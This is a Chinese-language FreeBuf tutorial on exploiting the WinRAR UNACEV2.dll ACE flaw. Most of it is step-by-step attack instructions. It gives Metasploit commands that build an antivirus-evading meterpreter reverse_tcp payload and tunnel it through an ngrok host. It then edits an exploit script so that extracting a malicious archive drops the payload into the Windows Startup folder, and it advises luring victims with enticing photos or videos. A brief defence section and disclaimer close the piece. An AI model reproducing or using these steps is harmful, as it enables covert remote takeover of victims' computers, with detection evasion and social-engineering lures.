*本文作者:艾登——皮尔斯,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。
前言
Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞,被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件,该文件自 2005 年发布至今就从未有过更新过,影响时长长达十余年之久。本篇文章鄙人会使用图文+视频的教程来给各位不知道利用的小粉们讲一下,视频教程在文末尾处。
漏洞细节: https://research.checkpoint.com/extracting-code-execution-from-winrar/
影响版本
WinRAR < 5.70 Beta 1
Bandizip< = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩< = 4.0.0.1170
准备
KaliLinux(版本随意我这里使用的版本是2019.1版本)
ngrok
Metasploit(KaliLinux2019.1已经集成了Metasploit5)
图文教程开始
1.1 下载WinRAR远程代码执行漏洞EXP利用文件:
1.2 打开你的浏览器打开https://www.ngrok.cc/ 有账号登录,没有账户注册登录。开通一个免费的隧道转发代理,把ngrok隧道协议设置成TCP,内网IP改成你自己的KaliLinux的内网IP,内网端口号任意填写不冲突即可。
1.3 记住如图所示红线框起来的两部分内容,后面会用到。
1.4 然后下载ngrok脚本到你的KaliLinux上面,选择”Linux 64Bit版本”保存到桌面上,运行脚本开启代理。
./sunny clientid [隧道ID]
Metasploit生成免杀Payload 载荷(针对Windows10的defender)
2.1 使用Metasploit5自带的免杀模块生成Payload
msfconsole
use evasion/windows/windows_defender_exe(选择msf5免杀模块)
show info(显示模块信息)
set filename WinRarPayloadTest.exe(设置Payload名字 )
set payload windows/meterpreter/reverse_tcp(设置Payload类型 )
set lhost free.idcfengye.com(设置上线地址,填写Ngrok映射出去的地址即可)
set lport 12352(设置监听端口,填写Ngrok映射出去的端口即可 )
run(生成Payload)
(Payload的路径地址:/root/.msf4/local/WinRarPayload.exe)
2.2 把Payload移动到apache2网站根目录下
cp /root/.msf4/local/xxxxx.exe /var/www/htm
2.3 启动阿帕奇服务
service apache2 start
2.4 物理机访问KaliLinux的IP地址,下载这个Payload文件到EXP文件夹下的根目录。
2.5 打开exp.py文件把“calc.exe“修改成”WinRarPayload.exe”保存。
2.6 Python运行exp.py文件自动在文件根目录下生成恶意压缩包。
2.7 已经成功生成了恶意的压缩包,这时候你们往里面丢一些照片视频(你懂的)什么的就变成了诱人的压缩包了。
Windows7靶机下载解压这个恶意压缩包:
3.1 解压后自动在系统启动目录下自动出现我们之前生成的Payload。
Windows7系统启动目录:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。
Metasploit启动远程监听主机上线请求:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
set lport 8989
run
确保ngrok后台在运行,然后重启Windows7靶机,metasploit监听等待上线。
视频复现教程
https://www.lanzous.com/i3a0ide 密码:FreeBuf
防御方法
1. 卸载Winrar,下载7z,安装包体积小,压缩解压速度快(传送门)
2. 删除UNACEV2.dll文件
3. 不下载解压来历不明的压缩包(色字头上一把刀,手冲一时爽)
小结
evasion/windows/windows_defender_exe这个免杀模块基本可以免杀大多杀毒软件(Windows10 Defender,火绒等等),也可以通过Shllecode编码的方式来达到免杀的效果,条条大路通罗马。其次你也可以使用Windows平台下的其他远程RAT(Njrat,Ghost等等)来生成恶意的压缩包,Windows平台的内网穿透工具可以使用"网络通",来达到效果。文章和视频仅用于安全教育的范畴;切勿违法使用,视频配BGM是鄙人喜好,望各位前辈多多包涵。
*本文作者:艾登——皮尔斯,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。